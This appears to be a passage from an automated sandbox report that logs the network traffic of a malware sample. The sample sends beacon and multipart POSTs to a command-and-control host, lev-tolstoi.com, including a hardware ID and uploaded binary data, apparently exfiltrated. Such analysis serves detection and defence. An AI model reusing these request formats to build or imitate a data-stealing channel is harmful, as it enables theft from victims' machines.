2024-12-26 12:01:33 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: lev-tolstoi.com
2024-12-26 12:01:33 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-26 12:01:33 UTC	1121	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 12:01:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dat0smdq8uel2iuppff50fkkql; expires=Mon, 21 Apr 2025 05:48:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WZGMe3G8a%2FWXeDjC6ZlcM3MbPHdW2ij3iPvuIj9Seq%2FwsbQShoElSwNs17XVbhlFG3wdR3IMlwzza5HyysZImccsjofhknuYt9epXPz1vGGIuR0zdHvQeG1FycKI5CyWQVI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80eab7ff464326-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1525&rtt_var=595&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=952&delivery_rate=1803582&cwnd=178&unsent_bytes=0&cid=e68e1cf246407a80&ts=795&x=0"
2024-12-26 12:01:33 UTC	248	IN	Data Raw: 34 36 62 0d 0a 32 2f 56 37 4d 46 57 61 42 5a 57 6b 50 79 62 6d 38 49 78 61 56 74 70 59 4b 55 76 2b 62 68 70 56 47 76 35 45 39 41 52 69 46 32 65 67 31 77 30 53 62 36 34 70 74 39 64 61 42 4e 79 45 2f 69 38 7a 39 6e 70 49 4c 39 78 55 66 44 52 32 6a 53 48 59 4a 68 52 36 52 65 47 54 47 6c 77 6d 2f 79 6d 33 77 55 63 45 33 4b 76 33 65 44 4f 30 65 68 4e 70 6d 77 52 34 4e 48 61 63 4a 5a 39 72 45 6e 73 45 73 35 6b 63 57 44 44 35 59 66 54 49 55 6b 4f 44 6c 65 30 77 4f 4c 4d 31 51 53 62 63 51 6a 67 77 59 4e 78 2b 31 6b 6b 48 59 77 61 57 6c 41 68 62 64 2b 63 70 37 6f 5a 61 53 4d 54 4b 72 6a 73 7a 75 44 52 50 4c 35 55 47 63 6a 31 2b 6e 53 43 65 64 41 74 78 44 37 4f 58 48 31 6b 36 38 48 58 35 77 6c 56 49 68 5a 2f 74 65 48 72 34 50 56 4e 70 78 45 77 Data Ascii: 46b2/V7MFWaBZWkPybm8IxaVtpYKUv+bhpVGv5E9ARiF2eg1w0Sb64pt9daBNyE/i8z9npIL9xUfDR2jSHYJhR6ReGTGlwm/ym3wUcE3Kv3eDO0ehNpmwR4NHacJZ9rEnsEs5kcWDD5YfTIUkODle0wOLM1QSbcQjgwYNx+1kkHYwaWlAhbd+cp7oZaSMTKrjszuDRPL5UGcj1+nSCedAtxD7OXH1k68HX5wlVIhZ/teHr4PVNpxEw
2024-12-26 12:01:33 UTC	890	IN	Data Raw: 72 42 58 75 4e 4e 34 4e 72 45 48 4e 46 70 74 6b 41 45 6a 44 30 4a 36 2b 47 56 55 69 4b 6c 2b 30 33 4d 37 6b 36 57 53 61 63 44 33 41 2f 66 4a 59 70 6d 57 6b 4f 66 77 4b 78 6e 68 35 64 4d 50 42 68 2b 4d 55 64 43 73 53 56 39 6e 68 73 2b 42 70 62 4b 70 38 59 64 53 59 34 67 32 69 50 4a 67 64 35 52 65 48 58 48 31 77 32 39 57 66 6c 7a 6c 5a 50 67 59 44 6c 4d 54 6d 31 4f 6b 59 6a 6b 77 39 34 4d 48 4b 57 4b 5a 78 69 44 58 67 44 75 5a 64 5a 48 48 66 2f 66 37 65 65 48 57 65 42 67 75 6b 30 49 76 6f 41 43 7a 62 53 46 54 67 77 64 4e 78 2b 31 6d 34 46 64 67 61 79 6d 42 70 61 50 4f 70 6e 35 63 42 51 51 5a 61 55 36 7a 59 2b 75 79 68 42 4a 35 6f 50 63 54 78 78 6d 53 47 53 4a 6b 34 31 41 71 48 58 51 52 49 57 39 57 7a 37 7a 45 70 45 78 49 32 67 49 58 53 2f 4e 67 74 78 33 41 Data Ascii: rBXuNN4NrEHNFptkAEjD0J6+GVUiKl+03M7k6WSacD3A/fJYpmWkOfwKxnh5dMPBh+MUdCsSV9nhs+BpbKp8YdSY4g2iPJgd5ReHXH1w29WflzlZPgYDlMTm1OkYjkw94MHKWKZxiDXgDuZdZHHf/f7eeHWeBguk0IvoACzbSFTgwdNx+1m4FdgaymBpaPOpn5cBQQZaU6zY+uyhBJ5oPcTxxmSGSJk41AqHXQRIW9Wz7zEpExI2gIXS/Ngtx3A
2024-12-26 12:01:33 UTC	1369	IN	Data Raw: 34 34 62 31 0d 0a 32 4e 45 77 2f 33 42 4d 32 4c 6a 69 62 4b 74 59 2b 51 48 6f 4b 74 70 38 5a 55 7a 50 31 59 2f 62 4c 55 55 32 48 6e 75 49 77 4f 62 51 2b 52 43 47 55 44 33 41 6c 64 70 49 67 6b 47 59 46 4e 55 76 35 6b 41 45 53 62 37 68 44 2b 64 46 4a 54 38 61 6e 37 54 59 36 76 79 77 4c 4e 74 49 56 4f 44 42 30 33 48 37 57 61 41 31 2b 43 62 36 65 47 46 45 33 38 6d 6e 34 7a 46 56 4d 68 4a 2f 76 4d 7a 79 2b 4e 30 41 6d 6b 77 74 77 4e 48 53 5a 4b 35 55 6d 54 6a 55 43 6f 64 64 42 45 68 4c 32 5a 4f 62 58 48 33 47 48 6e 4f 41 2f 49 76 67 6c 42 54 44 63 43 33 52 33 49 4e 77 73 6b 57 45 45 65 41 2b 36 6b 78 31 66 4f 50 46 75 2f 74 52 58 53 49 71 41 34 7a 49 78 74 6a 5a 4f 4a 70 77 4e 65 54 6c 79 6c 32 62 59 4a 67 64 74 52 65 48 58 4e 6c 38 6e 36 6d 33 38 31 78 39 78 Data Ascii: 44b12NEw/3BM2LjibKtY+QHoKtp8ZUzP1Y/bLUU2HnuIwObQ+RCGUD3AldpIgkGYFNUv5kAESb7hD+dFJT8an7TY6vywLNtIVODB03H7WaA1+Cb6eGFE38mn4zFVMhJ/vMzy+N0AmkwtwNHSZK5UmTjUCoddBEhL2ZObXH3GHnOA/IvglBTDcC3R3INwskWEEeA+6kx1fOPFu/tRXSIqA4zIxtjZOJpwNeTlyl2bYJgdtReHXNl8n6m381x9x
2024-12-26 12:01:33 UTC	1369	IN	Data Raw: 68 73 2b 42 56 49 50 35 5a 4d 5a 33 6c 68 33 43 47 61 4a 6c 67 31 44 37 57 54 47 6c 34 2b 39 47 72 32 77 6c 70 4a 67 4a 4c 6f 50 6a 47 35 4d 55 4d 6c 6b 77 5a 30 4d 33 53 56 49 4a 70 6c 41 33 4e 46 39 39 63 65 53 6e 65 67 4a 39 62 4c 56 6b 69 45 6b 66 38 2f 64 50 5a 36 52 53 2b 63 54 43 41 68 61 49 73 68 69 53 67 5a 4e 51 4b 31 31 30 45 53 50 65 70 69 2b 63 4a 58 51 59 43 65 35 44 67 78 71 6a 4a 4e 4c 70 41 45 66 54 68 2b 6d 53 75 52 62 51 4e 6e 46 37 71 54 46 31 35 33 74 69 66 77 33 68 30 63 78 4c 66 35 4f 79 53 2b 4f 51 73 32 30 68 55 34 4d 48 54 63 66 74 5a 6d 44 6e 6b 4f 76 70 77 53 56 6a 50 34 61 76 7a 49 55 30 32 49 6d 75 49 2f 4a 72 55 2f 51 79 4f 56 43 58 51 36 65 34 34 6c 6c 79 5a 4f 4e 51 4b 68 31 30 45 53 45 4d 74 51 31 49 5a 43 43 70 33 53 36 Data Ascii: hs+BVIP5ZMZ3lh3CGaJlg1D7WTGl4+9Gr2wlpJgJLoPjG5MUMlkwZ0M3SVIJplA3NF99ceSnegJ9bLVkiEkf8/dPZ6RS+cTCAhaIshiSgZNQK110ESPepi+cJXQYCe5DgxqjJNLpAEfTh+mSuRbQNnF7qTF153tifw3h0cxLf5OyS+OQs20hU4MHTcftZmDnkOvpwSVjP4avzIU02ImuI/JrU/QyOVCXQ6e44llyZONQKh10ESEMtQ1IZCCp3S6
2024-12-26 12:01:33 UTC	1369	IN	Data Raw: 36 5a 79 71 54 42 7a 67 6f 4e 6f 56 6d 6b 57 70 41 4c 55 57 2b 6e 78 46 63 4e 50 35 73 2b 38 70 63 54 59 4b 58 35 6a 38 37 76 7a 4e 4d 4b 5a 6f 65 66 7a 70 78 6e 43 32 66 62 41 52 30 44 76 6e 5a 57 56 55 76 75 44 2b 33 39 46 70 53 6c 4a 47 75 4a 33 71 68 65 6b 77 6c 33 46 51 34 4f 6d 71 64 49 34 52 69 44 33 34 58 73 70 45 5a 56 79 58 2f 61 2f 33 4a 58 6b 79 4a 6b 65 59 71 4e 4c 55 36 57 54 75 61 42 33 5a 33 4e 74 77 68 6a 69 5a 59 4e 54 53 75 6e 46 6c 4e 65 65 45 6e 38 4d 6f 64 48 4d 53 52 35 44 55 36 71 6a 35 4e 49 70 38 43 63 44 4a 77 6d 43 79 62 61 51 74 2f 44 4c 47 58 46 6c 63 2f 38 32 48 35 78 31 74 49 69 64 4b 67 65 44 4f 67 65 68 4e 70 75 78 5a 31 4d 57 2b 4e 45 35 46 6d 55 54 55 61 39 34 35 5a 56 54 75 34 50 37 66 4c 55 55 36 4a 6c 2b 6f 77 4d 37 Data Ascii: 6ZyqTBzgoNoVmkWpALUW+nxFcNP5s+8pcTYKX5j87vzNMKZoefzpxnC2fbAR0DvnZWVUvuD+39FpSlJGuJ3qhekwl3FQ4OmqdI4RiD34XspEZVyX/a/3JXkyJkeYqNLU6WTuaB3Z3NtwhjiZYNTSunFlNeeEn8ModHMSR5DU6qj5NIp8CcDJwmCybaQt/DLGXFlc/82H5x1tIidKgeDOgehNpuxZ1MW+NE5FmUTUa945ZVTu4P7fLUU6Jl+owM7
2024-12-26 12:01:33 UTC	1369	IN	Data Raw: 33 41 74 30 64 79 44 63 4b 4a 74 67 41 58 51 4e 73 5a 63 66 57 44 50 37 62 76 54 42 56 45 4b 50 6b 65 51 33 4d 37 34 2b 53 79 4b 62 41 6e 34 79 63 35 56 6d 32 43 59 48 62 55 58 68 31 7a 39 78 4a 65 70 56 2b 63 56 47 42 4a 76 63 39 33 67 7a 74 48 6f 54 61 5a 63 45 64 79 56 39 6c 53 36 53 62 77 42 78 44 37 53 51 47 56 63 36 2f 57 50 35 77 6c 70 45 69 4a 33 70 4d 44 75 38 4f 6b 52 70 30 6b 78 2f 4c 7a 6a 45 5a 72 5a 74 46 6c 51 4c 73 6f 56 5a 54 58 6e 68 4a 2f 44 4b 48 52 7a 45 6e 4f 63 35 50 4c 59 32 51 79 32 4f 44 48 4d 2b 64 35 30 70 6c 6d 55 42 66 77 32 72 6b 52 6c 5a 50 2f 39 76 38 38 68 50 52 59 76 53 6f 48 67 7a 6f 48 6f 54 61 61 30 61 66 7a 42 33 33 67 2b 52 66 51 46 2f 42 72 4b 62 57 55 31 35 34 53 66 77 79 68 30 63 78 4a 2f 69 4e 54 43 71 4e 6b 73 Data Ascii: 3At0dyDcKJtgAXQNsZcfWDP7bvTBVEKPkeQ3M74+SyKbAn4yc5Vm2CYHbUXh1z9xJepV+cVGBJvc93gztHoTaZcEdyV9lS6SbwBxD7SQGVc6/WP5wlpEiJ3pMDu8OkRp0kx/LzjEZrZtFlQLsoVZTXnhJ/DKHRzEnOc5PLY2Qy2ODHM+d50plmUBfw2rkRlZP/9v88hPRYvSoHgzoHoTaa0afzB33g+RfQF/BrKbWU154Sfwyh0cxJ/iNTCqNks
2024-12-26 12:01:33 UTC	1369	IN	Data Raw: 48 64 7a 6b 69 4f 58 61 67 70 79 43 36 75 57 45 31 34 32 2f 32 44 38 31 46 5a 57 6a 35 72 74 4e 6a 79 78 4f 6b 55 70 6e 51 46 34 64 7a 62 63 49 59 34 6d 57 44 55 67 6d 6f 41 50 57 48 58 62 63 4f 48 4d 57 6b 69 53 6d 65 38 37 49 72 55 71 43 32 66 63 48 58 38 6d 4f 4d 51 77 68 6e 45 48 61 6b 75 67 31 78 35 65 64 36 41 6e 2f 4d 6c 54 53 59 2b 57 35 7a 30 38 75 7a 39 4f 49 35 41 41 65 54 39 78 6c 69 4f 54 59 41 70 32 43 37 61 57 46 56 59 2b 39 6d 36 33 69 42 31 44 6e 4e 4b 32 65 41 4b 6f 50 56 4d 6b 6a 45 35 4b 4e 47 6d 4e 4d 35 74 32 42 6a 63 71 75 70 73 61 56 7a 44 6f 4a 2b 69 49 52 41 53 44 6e 71 35 67 64 4c 67 2b 52 79 71 62 41 6e 63 36 64 35 73 74 6d 57 77 4f 5a 77 71 38 6e 78 56 61 4f 75 70 74 2f 64 52 55 54 59 6d 63 35 69 6f 33 2b 48 51 4c 4c 6f 52 4d Data Ascii: HdzkiOXagpyC6uWE142/2D81FZWj5rtNjyxOkUpnQF4dzbcIY4mWDUgmoAPWHXbcOHMWkiSme87IrUqC2fcHX8mOMQwhnEHakug1x5ed6An/MlTSY+W5z08uz9OI5AAeT9xliOTYAp2C7aWFVY+9m63iB1DnNK2eAKoPVMkjE5KNGmNM5t2BjcqupsaVzDoJ+iIRASDnq5gdLg+RyqbAnc6d5stmWwOZwq8nxVaOupt/dRUTYmc5io3+HQLLoRM
2024-12-26 12:01:33 UTC	1369	IN	Data Raw: 4a 6b 70 33 41 4e 5a 51 61 38 6b 43 64 73 4f 66 39 7a 38 4d 68 62 52 4d 54 63 72 6a 64 30 34 41 4d 4c 59 64 77 7a 4e 6e 64 67 33 48 37 57 55 77 4e 37 43 37 36 42 43 42 38 55 37 33 48 39 33 52 39 69 67 34 50 6e 4c 6a 6d 71 65 67 56 70 6d 6b 77 67 5a 7a 62 63 49 6f 63 6d 57 43 56 58 34 73 4a 4b 42 57 65 71 65 4c 6e 66 48 56 4c 45 79 72 78 32 64 4b 70 36 45 32 6e 62 44 32 6f 6c 66 70 38 77 6c 53 45 2b 53 79 57 79 67 52 68 66 50 50 52 5a 79 64 4e 65 53 6f 71 56 2b 43 6c 30 39 6e 70 45 61 63 51 31 4f 48 38 34 6f 32 6a 57 66 6b 41 74 52 59 79 55 46 31 77 77 37 6e 61 36 35 6c 5a 53 68 5a 2f 6c 4e 48 61 35 4e 31 73 75 33 45 49 34 4d 54 6a 45 64 74 67 6d 42 47 52 46 34 63 64 4c 43 57 4b 72 4d 4b 65 55 51 67 71 64 30 76 68 34 62 4f 70 30 43 7a 76 63 56 44 68 77 65 Data Ascii: Jkp3ANZQa8kCdsOf9z8MhbRMTcrjd04AMLYdwzNndg3H7WUwN7C76BCB8U73H93R9ig4PnLjmqegVpmkwgZzbcIocmWCVX4sJKBWeqeLnfHVLEyrx2dKp6E2nbD2olfp8wlSE+SyWygRhfPPRZydNeSoqV+Cl09npEacQ1OH84o2jWfkAtRYyUF1ww7na65lZShZ/lNHa5N1su3EI4MTjEdtgmBGRF4cdLCWKrMKeUQgqd0vh4bOp0CzvcVDhwe
2024-12-26 12:01:33 UTC	1369	IN	Data Raw: 6c 45 58 59 46 73 74 64 58 45 6a 47 34 50 36 57 49 48 55 43 56 30 72 5a 6f 5a 75 4e 76 47 48 37 4d 58 6d 64 35 59 64 77 77 31 6a 35 53 4f 30 57 72 31 30 45 53 63 50 74 31 35 63 42 65 55 6f 66 56 30 41 59 53 75 7a 31 4e 4b 70 49 62 61 58 56 58 6e 79 32 61 61 67 64 6a 4f 34 65 43 47 6c 77 35 2f 33 48 6d 68 68 4d 45 69 39 4b 32 41 58 53 70 4d 45 78 6c 31 45 42 70 4a 48 61 58 4d 4a 45 6d 50 7a 74 46 6f 64 64 42 45 67 4c 37 61 66 6e 42 53 31 58 4a 74 4f 30 2f 4d 72 73 30 58 44 6a 63 51 6a 67 78 4f 4d 52 30 32 43 59 45 5a 45 58 68 78 30 73 4a 59 71 73 77 70 35 52 43 43 70 33 53 2b 48 68 73 36 33 51 4c 4f 39 78 55 4f 48 42 32 6b 53 65 56 61 41 4e 6e 46 37 2b 55 44 31 46 77 78 6c 6e 53 79 31 42 42 69 70 58 51 42 68 57 79 4b 6b 59 6d 6d 7a 4a 47 41 47 6d 62 4e 74 Data Ascii: lEXYFstdXEjG4P6WIHUCV0rZoZuNvGH7MXmd5Ydww1j5SO0Wr10EScPt15cBeUofV0AYSuz1NKpIbaXVXny2aagdjO4eCGlw5/3HmhhMEi9K2AXSpMExl1EBpJHaXMJEmPztFoddBEgL7afnBS1XJtO0/Mrs0XDjcQjgxOMR02CYEZEXhx0sJYqswp5RCCp3S+Hhs63QLO9xUOHB2kSeVaANnF7+UD1FwxlnSy1BBipXQBhWyKkYmmzJGAGmbNt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.21.66.86	443	4296	C:\Users\user\Desktop\z3IxCpcpg4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 12:01:36 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=X3YLTM624G2CSO3HO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12835 Host: lev-tolstoi.com
2024-12-26 12:01:36 UTC	12835	OUT	Data Raw: 2d 2d 58 33 59 4c 54 4d 36 32 34 47 32 43 53 4f 33 48 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 35 46 41 44 41 43 33 45 31 45 43 43 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 58 33 59 4c 54 4d 36 32 34 47 32 43 53 4f 33 48 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 33 59 4c 54 4d 36 32 34 47 32 43 53 4f 33 48 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --X3YLTM624G2CSO3HOContent-Disposition: form-data; name="hwid"275FADAC3E1ECC72BEBA0C6A975F1733--X3YLTM624G2CSO3HOContent-Disposition: form-data; name="pid"2--X3YLTM624G2CSO3HOContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-12-26 12:01:37 UTC	1132	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 12:01:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sddqunb9feu47sssb8p2kopbt2; expires=Mon, 21 Apr 2025 05:48:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tGjP1qyv%2BJzHAWTjRzlL0NtmDqFruaLX4O2p3Ear9R5FL1RVlJroC2Ty6ABUyt%2FKeVFSVjgV9aV0I3Z53%2FualU9pakteigbqL9L0xJ%2FJnllqSgh7hdbQ%2FNZa8dfRKL%2FyWnM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80eaca6dd06a4e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1747&rtt_var=664&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13773&delivery_rate=1637689&cwnd=202&unsent_bytes=0&cid=d2a6906066d980b6&ts=912&x=0"
2024-12-26 12:01:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 12:01:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	104.21.66.86	443	4296	C:\Users\user\Desktop\z3IxCpcpg4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 12:01:38 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6CAL58ZJMXGVFKJS9MT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15089 Host: lev-tolstoi.com
2024-12-26 12:01:38 UTC	15089	OUT	Data Raw: 2d 2d 36 43 41 4c 35 38 5a 4a 4d 58 47 56 46 4b 4a 53 39 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 35 46 41 44 41 43 33 45 31 45 43 43 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 43 41 4c 35 38 5a 4a 4d 58 47 56 46 4b 4a 53 39 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 43 41 4c 35 38 5a 4a 4d 58 47 56 46 4b 4a 53 39 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 Data Ascii: --6CAL58ZJMXGVFKJS9MTContent-Disposition: form-data; name="hwid"275FADAC3E1ECC72BEBA0C6A975F1733--6CAL58ZJMXGVFKJS9MTContent-Disposition: form-data; name="pid"2--6CAL58ZJMXGVFKJS9MTContent-Disposition: form-data; name="lid"LOGS11--Li
2024-12-26 12:01:39 UTC	1132	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 12:01:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g53bn6fqgloqetrisqkjf322vu; expires=Mon, 21 Apr 2025 05:48:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8nbzXPlCV3m4oQ3QuvQGf46KrY%2Fyrh3%2Beuji5UOKQcDALVVm%2FDdPq2IA8iIt0CQm8oXLsttXkX8o0vwd5FTBMut6I9OSCK5cy6nFxotAcrXt%2Fxyp%2Bj9eugzdkrL1u9nwTcQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80ead95f6eefa1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1763&rtt_var=674&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2834&recv_bytes=16029&delivery_rate=1609702&cwnd=165&unsent_bytes=0&cid=b6fbce29db03f563&ts=1069&x=0"
2024-12-26 12:01:39 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 12:01:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49710	104.21.66.86	443	4296	C:\Users\user\Desktop\z3IxCpcpg4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 12:01:41 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=J9HQ4NFV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20513 Host: lev-tolstoi.com
2024-12-26 12:01:41 UTC	15331	OUT	Data Raw: 2d 2d 4a 39 48 51 34 4e 46 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 35 46 41 44 41 43 33 45 31 45 43 43 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4a 39 48 51 34 4e 46 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 39 48 51 34 4e 46 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4a 39 48 51 34 4e 46 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --J9HQ4NFVContent-Disposition: form-data; name="hwid"275FADAC3E1ECC72BEBA0C6A975F1733--J9HQ4NFVContent-Disposition: form-data; name="pid"3--J9HQ4NFVContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--J9HQ4NFVContent-Di
2024-12-26 12:01:41 UTC	5182	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 Data Ascii: un 4F([:7s~X`nO`i`
2024-12-26 12:01:42 UTC	1137	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 12:01:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vr9bhraqgvsm3oebpu7gf7uc6l; expires=Mon, 21 Apr 2025 05:48:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TWX3y%2BEeKaFSYGZ5l%2B91447WxNhox%2FMMfmBA1cfZISyoErHt1G%2FwhOWtI%2FLqmcLekAyRToCv2bjfjERCFDyw8BybA3xj%2FE%2FskuAuZx3kVdzDmbVh2c67Jvhn%2BYK3JAL74PY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80eae98ab14240-EWR alt-svc: h3=":443"; ma=86400 server-timing: 